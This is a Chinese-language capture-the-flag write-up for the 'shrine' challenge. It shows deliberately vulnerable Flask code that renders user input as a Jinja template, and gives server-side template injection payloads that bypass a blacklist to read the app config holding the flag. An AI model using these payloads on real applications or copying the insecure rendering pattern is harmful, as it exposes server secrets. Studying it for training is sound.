buuctf-[WesternCTF2018]shrine(小宇特详解)
1.先看题目
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
//注册了一个名为FLAG的config
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) //这里把config,self做了黑名单过滤,替换为空
+ s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
这里推测flag在名为FLAG的config中,但是这里有黑名单过滤了config
这里可以进行ssti注入
这里进行判断
payload:
/shrine/{{6*6}}
这里可以进行ssti模板注入
这里可以利用两个python自带的函数来进行注入
url_for这个可以用来构造url,接受函数名作为第一个参数
get_flashed_message()是通过flash()传入闪现信息列表的,能够把字符串对象表示的信息加入到一个消息列表,然后通过调用get_flashed_message()来取出。
构造payload
/shrine/{{url_for.__globals__}}
这里的current_app意思是当前app,我们访问当前app的config
/shrine/{{url_for.__globals__['current_app'].config}}
然后get_flashed_message()也是同理
payload:
/shrine/{{get_flashed_messages.__globals__['current_app'].config}}